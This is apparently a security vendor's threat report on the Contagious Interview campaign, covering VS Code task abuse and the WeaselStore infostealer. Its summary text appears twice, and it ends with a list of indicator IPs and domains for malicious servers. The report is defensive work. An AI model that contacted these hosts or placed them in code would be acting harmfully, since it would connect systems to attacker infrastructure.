Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains Part 2
Contents
Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains Part 2
Summary
*Abstract customers already have visibility into the behaviors described in this report.
This post is a continuation of Part 1 which covered new techniques used in the Contagious Interview campaign. For complete context on VS Code task abuse in the campaign, please see the original post on tracking this vector. In this final part, we expand on the previous post and cover in greater detail what options are currently available to mitigate VS Code Tasks abuse.
Findings
What WeaselStore Has in Store
The previous post observed the use of GitHub Gist-hosted scripts to download and execute next-stage payloads which subsequently led to installation of WeaselStore infostealer/RAT. WeaselStore targeting Windows is implemented in Python (AKA PylangGhost) while the variant targeting macOS is written in Go (AKA GolangGhost). The samples make heavy use of LLM-generated code, and with it comes a number of bugs …
Summary
*Abstract customers already have visibility into the behaviors described in this report.
This post is a continuation of Part 1 which covered new techniques used in the Contagious Interview campaign. For complete context on VS Code task abuse in the campaign, please see the original post on tracking this vector. In this final part, we expand on the previous post and cover in greater detail what options are currently available to mitigate VS Code Tasks abuse.
Findings
What WeaselStore Has in Store
The previous post observed the use of GitHub Gist-hosted scripts to download and execute next-stage payloads which subsequently led to installation of WeaselStore infostealer/RAT. WeaselStore targeting Windows is implemented in Python (AKA PylangGhost) while the variant targeting macOS is written in Go (AKA GolangGhost). The samples make heavy use of LLM-generated code, and with it comes a number of bugs …
IoC
http://23.227.203.99:8080
http://camdriver.pro
http://144.172.115.189:8080
https://ip-checking-notification-firebase-2.vercel.app/api
144.172.115.189
23.227.203.99
http://camdriver.pro
http://144.172.115.189:8080
https://ip-checking-notification-firebase-2.vercel.app/api
144.172.115.189
23.227.203.99